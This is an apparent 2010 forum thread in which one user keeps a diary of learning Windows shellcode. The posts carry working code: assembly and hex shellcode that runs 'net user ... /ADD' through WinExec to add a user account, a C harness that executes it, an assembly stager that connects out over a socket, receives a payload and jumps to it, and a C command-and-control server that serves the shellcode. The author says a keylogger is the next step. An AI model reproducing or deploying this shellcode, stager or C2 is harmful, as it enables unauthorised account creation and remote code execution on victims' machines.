My shellcode trail and error diary

Printable View

01-24-2010, 10:25 AM
pigtail

My shellcode trail and error diary

I'm trying to learn how to write shellcode. I'm planning on writing my trails and errors in some type of diary
and hopefully it can help others.

The software that I'm using is Borland C++ with CodeBlocks IDE(TASM), Windows Server 2k3

Using the Winexec function, passing the parmeters of WinExec("cmd.exe /c net user laser laserpass /ADD",0);
IDA disambly

Code:

asm xor esi ,esi; asm push esi; asm mov esi ,0x4444412F; This group of asm is the string "cmd.ex....", writen from the right side to left asm push esi; After move 4 charcters into esi, esi gets loaded onto the stack to be read latter asm mov esi ,0x20737361; We have to take along all the data that the shellcode will need, stopping us from asm push esi; just declareing char string[50] = "cmd...." asm mov esi ,0x70726573; asm push esi; asm mov esi ,0x616C2072; asm push esi; asm mov esi ,0x6573616C; asm push esi; asm mov esi ,0x20726573; asm push esi; asm mov esi ,0x75207465; asm push esi; asm mov esi ,0x6E20632F; asm push esi; asm mov esi ,0x20657865; asm push esi; asm mov esi ,0x2E646D63; asm push esi; asm mov ecx ,esp; Place the string directly into the first parm of Winexec(#2), results in it trying to find the instruction or data at the address of string(0x2E646D63) rather than 0012FF7C Copying the stack pointer and moving it into ecx, we well beable to refence it latter asm xor eax ,eax; asm push eax; This part zeros out eax and push it onto the stack at 0012FF78 , for the second parm asm mov ebx ,ecx; This moves the old stackpointer(above) into ebx and push that as the first parm asm push ebx; 0012FF74 dd 12FF7Ch asm mov ebx ,0x77ea411e; Kernel32 is in all windows programs serach using a disambly the address of WinExec is asm call ebx; at 0x77ea411e . If you create a program that calls WinExec in C the function will show up in the functions table. 0012FF54 dd 407116h ; __create_lock+62 0012FF58 dd 40BDB0h ; .data:CriticalSection 0012FF5C dd 12FF90h ; Stack[00000A48]:retaddr 0012FF60 dd 406C8Bh ; sub_406C7C+F 0012FF64 dd 40BD90h ; .data:___exit_lock 0012FF68 dd 40AC68h ; .data:aCreatingAtexit 0012FF6C dd 406BA5h ; __init_exit_proc:loc_406BA5 0012FF70 dd 0 0012FF74 dd 12FF7Ch 0012FF78 dd 0 0012FF7C dd 2E646D63h ; cmd. 0012FF80 dd 657865h ; exe 0012FF84 ; [BEGIN OF STACK FRAME _main. PRESS KEYPAD "-" TO COLLAPSE] 0012FF84 dd 4090DCh ; .data:off_4090DC 0012FF88 dd 7FFD4000h 0012FF8C saved_fp dd 12FFB8h ; Stack[00000A48]:saved_fp 0012FF90 retaddr dd 406E02h ; __startup+172 0012FF94 argc dd 1

To test the shellcode a C program like below

Quote:

#include <stdio.h>

main() {

char scode[] = "\x56\x33\xf6\x56"
"\xbe\x2f\x41\x44\x44\x56\xbe\x61\x73\x73\x20\x56\ xbe\x73\x65\x72"
"\x70\x56\xbe\x72\x20\x6c\x61\x56\xbe\x6c\x61\x73\ x65\x56\xbe\x73\x65\x72\x20\x56"
"\xbe\x65\x74\x20\x75\x56\xbe\x2f\x63\x20\x6e\x56\ xbe\x65\x78\x65\x20\x56\xbe\x63"
"\x6d\x64\x2e\x56\x33\xf6\x8b\xcc\x33\xc0\x50\x33\ xdb\x8b\xd9\x53\x33\xdb\xbb\x1e"
"\x41\xea\x77\xff\xd3\x33\xdb\x33\xc0\x33\xc0\x5e\ x5b\x5d\xc3\x90";

int (*func)();
func = (int (*)()) scode;
(int)(*func)();
}

My next project will be a stager and C&C, so I can pass shellcode above to get executed
01-26-2010, 10:34 AM
pigtail

Re: My shellcode trail and error diary

Quote:

Trying to create a stager is alot more difficult than I thought at first, these link were of great help
"w.w.w.metasploit.com/shellcode/windows/" & "w.w.w.vividmachines.com/shellcode/shellcode.html", I learnt that a function(in C) like func(string[40]); to use it in a shellcode
you move esp by 40d(asm sub esp ,40), and then push the address of the bottom. Asm doesn't understand static buffers or struct, but just makeing room for the space(int one = 0x04)
Learnt that most function that don't return a value, will not change to much of the data in the register when
it returns

asm xor eax ,eax;
asm xor ebx ,ebx;
asm mov esi ,0x4C4C44; these three hex values are WSOCK32.DLL back to front
asm push esi;
asm mov esi ,0x2E32334B;
asm push esi;
asm mov esi ,0x434F5357;
asm push esi;
asm mov ebx ,esp; This places the pointer to the buffer into ebx then onto the stack,
asm push ebx; which we pass to loadlibary
asm mov ecx ,0x77e41dc6;
asm call ecx;

asm sub sp ,400; These is above (buffer, struct), it holds 400d , i'm still trying things
asm push esp; and I think it would be better to have esp, to stop esp 0x1234 from wrapping around
asm push 0x101; if possable . version for communcation
asm mov ecx ,0x71c04f3b; WSAStartup address in wsock32
asm call ecx;

asm xor eax ,eax;
asm push eax; pass 2,1,0,0,0,0 pretty much copyed pasted from metasploit, changed it around
asm push eax; instead of inc eax , sub 0xffffffff = +1
asm push eax;
asm push eax;
asm sub eax ,0xffffffff;
asm push eax;
asm sub eax ,0xffffffff;
asm push eax;
asm mov ecx ,0x71c0410c; Calls socket
asm call ecx;
asm mov ebx ,eax; returns the handle stores it in ebx.

asm push 0x0100007f; 127.0.0.1 address 127 = 7fh Are network + comes in handy :)
asm push 0xb3150002; port 5555; plus 0002 for AF_INET
asm mov ecx ,esp; declares the struct for connect, uses raw data, means no need for inet/htons calls
asm push byte 0x10;
asm push ecx;
asm push ebx;
asm mov ecx ,0x71c0446a; connect
asm call ecx;

asm xor eax ,eax;
asm mov edi ,2000; 2000 bytes for our shell code used for length
asm sub esp ,edi; these two commands makes space then copys the bottom address into ebp
asm mov ebp , esp;
asm push eax; flags = 0
asm push edi; length = 2000
asm push ebp; pointer to bottom of buffer
asm push ebx; socket handle from above.
asm mov ecx ,0x71bb1120; recv
asm call ecx;

asm jmp esp; Our buffer was create before the values that get taken of the stack becasue
of the recv function, the shellcode that was recived should be at the esp value.

Still have to learn some more, without need help from other web sites.
I'm going to try and work on fork() block, so the shellcode that gets sent will have its own area to run,
which should help on the keylogger code next.

Later

post two.......two
01-26-2010, 10:42 AM
pigtail

Re: My shellcode trail and error diary

This is the Command and Control centre that I will be useing

Code:

#include <stdio.h> #include <windows.h> #include <stdlib.h> #include <string.h> #include <winsock2.h> main() { WORD wVersionRequested; WSADATA wsaData; wVersionRequested = MAKEWORD(2,2); WSAStartup(wVersionRequested,&wsaData); SOCKET m_socket; m_socket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); sockaddr_in service; service.sin_family = AF_INET; service.sin_addr.s_addr = inet_addr("127.0.0.1"); service.sin_port = htons(5555); bind(m_socket,(SOCKADDR*)&service, sizeof(service)); listen(m_socket, 10); m_socket = accept(m_socket,NULL,NULL); //unsigned char scode[] = //"\x56\x33\xf6\x56\xbe\x2f\x41\x44\x44\x56\xbe\x61\x73\x73\x20\x56\xbe\x73\x65\x72" //"\x70\x56\xbe\x72\x20\x6c\x61\x56\xbe\x6c\x61\x73\x65\x56\xbe\x73\x65\x72\x20\x56" //"\xbe\x65\x74\x20\x75\x56\xbe\x2f\x63\x20\x6e\x56\xbe\x65\x78\x65\x20\x56\xbe\x63" //"\x6d\x64\x2e\x56\x33\xf6\x8b\xcc\x33\xc0\x50\x33\xdb\x8b\xd9\x53\x33\xdb\xbb\x1e" //"\x41\xea\x77\xff\xd3\x33\xdb\x33\xc0\x33\xc0\x5e\x5b\x5d\xc3\x90"; //96 bytes unsigned char scode[] = //"\x55\x8b\xec\x53 "\x56\x33\xf6\x56" "\xbe\x2f\x41\x44\x44\x56\xbe\x61\x73\x73\x20\x56\xbe\x73\x65\x72" "\x70\x56\xbe\x72\x20\x6c\x61\x56\xbe\x6c\x61\x73\x65\x56\xbe\x73\x65\x72\x20\x56" "\xbe\x65\x74\x20\x75\x56\xbe\x2f\x63\x20\x6e\x56\xbe\x65\x78\x65\x20\x56\xbe\x63" "\x6d\x64\x2e\x56\x33\xf6\x8b\xcc\x33\xc0\x50\x33\xdb\x8b\xd9\x53\x33\xdb\xbb\x1e" "\x41\xea\x77\xff\xd3\x33\xdb\x33\xc0\x33\xc0\x5e\x5b\x5d\xc3\x90"; send(m_socket,scode,strlen(scode),0); //recv(m_socket,scode, 300,0); //printf("%s\n",scode); Sleep(1000); exit(1); // }